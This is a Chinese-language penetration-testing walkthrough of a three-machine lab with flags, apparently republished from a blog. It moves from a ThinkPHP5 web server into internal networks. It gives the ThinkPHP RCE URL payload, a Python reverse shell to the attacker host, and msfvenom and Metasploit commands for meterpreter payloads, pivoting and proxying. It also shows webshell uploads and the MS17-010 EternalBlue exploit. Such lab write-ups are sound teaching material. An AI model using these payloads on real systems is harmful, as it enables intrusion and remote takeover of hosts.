从web到内网渗透的一次过程详解
目录
- 记一次从web到内网的渗透
- 拓扑图
- 环境介绍
- 渗透过程
- target1
- target2
- taget3
记一次从web到内网的渗透
拓扑图
文章图片
环境介绍
现在有三台机器,分别为target1,target2,target3,里面分别有三个flag,每个flag的分值不同,需要通过拿下一个已知IP(target1)进而向内网里面进行渗透,最终要成功获得三台主机权限
渗透过程
target1 使用nmap进行扫描
文章图片
可以看到开启了80端口
浏览器访问目标靶机80端口
文章图片
可以看到就是apache的默认页面
使用dirb进行目录结构扫描
文章图片
发现
public
页面文章图片
可以看到是thinkphp5搭建的网站,thinkphp5曾经爆过一个远程代码执行的漏洞,直接上网站寻找payload验证是否存在漏洞
http://192.168.109.181/public/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
文章图片
可以看到确实存在漏洞,现在可以向网站里面写入一句话木马,然后用蚁剑去连接,这是一种方法,但是也可以直接去尝试反弹一个shell到kali上
kali上执行:nc -lvvp 4444浏览器中执行:http://192.168.109.181/public/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=python%20-c%20%27import%20socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect((%22192.168.109.128%22,4444)); os.dup2(s.fileno(),0); %20os.dup2(s.fileno(),1); %20os.dup2(s.fileno(),2); p=subprocess.call([%22/bin/sh%22,%22-i%22]);
可以看到kali这边成功反弹到了一个shell
文章图片
使用python生成一个交互式的shell
文章图片
查找一下flag
文章图片
成功获得第一个flag
使用msfvenom生成一个反向的shellcode
msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.109.128 lport=5555 -f elf > msf.elf
文章图片
使用python开启一个临时http服务
文章图片
靶机下载该shellcode
文章图片
然后kali打开msf,进行监听
use exploit/multi/handlerset payload linux/x64/meterpreter/reverse_tcpset lport 5555set lhost 192.168.109.128exploit
文章图片
然后靶机上给予shellcode执行的权限后执行该文件
文章图片
可以看到kali这边成功返回一个meterpreter
文章图片
查看一下网络配置
文章图片
可以看到target1还存在一个网段
添加路由表
文章图片
配置socks代理
use auxiliary/server/socks_proxyexploit
文章图片
配置proxychains代理链
vim /etc/proxychains4.conf
文章图片
target2 扫描10.1.1.0/24这个网段是否还存在其他机器
use auxiliary/scanner/portscan/tcpset rhosts 10.1.1.0/24set ports 1-1000set threads 50exploit
文章图片
可以看到该网段还存在一台机器为10.1.1.150
使用nmap扫描10.1.1.150开放端口
proxychains4 nmap -Pn -sT 10.1.1.150
文章图片
可以看到也开放了80端口
这里直接用浏览器去访问10.1.1.150的80端口显然是不行的,不过火狐浏览器也是支持socks代理的
文章图片
再次访问网站
文章图片
查看
robots.txt
文件文章图片
找到后台登入位置
文章图片
直接使用弱密码
admin:admin
登入成功文章图片
成功获得第二个flag,找到模板位置,发现里面的源码都是可以编辑的
文章图片
写入一句话木马
文章图片
然后使用蚁剑去连接,当然直接去连接肯定也是不行的,不过蚁剑也是支持代理设置的
文章图片
之后再正常去连接就行了,但是我这里不知道是环境问题还是蚁剑的问题,正常来说这里是肯定能连接成功的,我试了很多遍都没有成功,然后想着直接把那个页面里面的源码直接换为大马,也是不行的,因为一般大马都是经过作者编译过了,直接复制过去肯定会有问题,最后只能直接将大马事先准备在了网站根目录下面,这里主要是为了体现内网渗透,所以这里也不细说
访问大马
文章图片
使用msfvenom生成一个正向连接的shellcode
msfvenom -p windows/meterpreter/bind_tcp lport=6666 -f exe -o 1.exe
文章图片
然后通过大马将shellcode上传到目标服务器
文章图片
然后再次进入之前打开的msf
文章图片
然后在大马上执行上传的shellcode
文章图片
可以看到kali这边成功返回了一个meterpreter
文章图片
查看网络配置
文章图片
可以看到还有一个网段10.1.2.0/24
将路由添加到路由表
run post/multi/manage/autoroute
文章图片
taget3 扫描10.1.2.0/24网段是否还存在其他机器
use auxiliary/scanner/portscan/tcpset rhosts 10.1.2.0/24set ports 1-1000set threads 100exploit
文章图片
这里扫描实在太慢,这个网段还有一个机器IP为10.1.2.250
然后再添加一层socks代理
use auxiliary/server/socks_proxyset srvport 2222exploit
文章图片
配置proxychains代理链
vim /etc/proxychains4.conf
文章图片
使用nmap进行端口扫描
proxychains4 nmap -Pn -sT 10.1.2.250
文章图片
根据扫描结果判断操作系统为windows
再使用nmap的漏扫脚本进行扫描
proxychains4 nmap --script=vuln 10.1.2.250
文章图片
可以看到存在ms17-010,直接上msf寻找攻击模块
use exploit/windows/smb/ms17_010_eternalblueset payload windows/x64/meterpreter/bind_tcpset rhost 10.1.2.250exploit
文章图片
查找一下flag
文章图片
三台主机的权限全部那先,所有flag查找完毕,至此,渗透结束
【从web到内网渗透的一次过程详解】以上就是从web到内网渗透的一次过程详解的详细内容,更多关于web到内网渗透过程的资料请关注脚本之家其它相关文章!
推荐阅读
- 2018-02-06第三天|2018-02-06第三天 不能再了,反思到位就差改变
- 一个小故事,我的思考。
- Docker应用:容器间通信与Mariadb数据库主从复制
- 第三节|第三节 快乐和幸福(12)
- 你到家了吗
- 一个人的碎碎念
- 遇到一哭二闹三打滚的孩子,怎么办┃山伯教育
- 死结。
- 我从来不做坏事
- 赢在人生六项精进二阶Day3复盘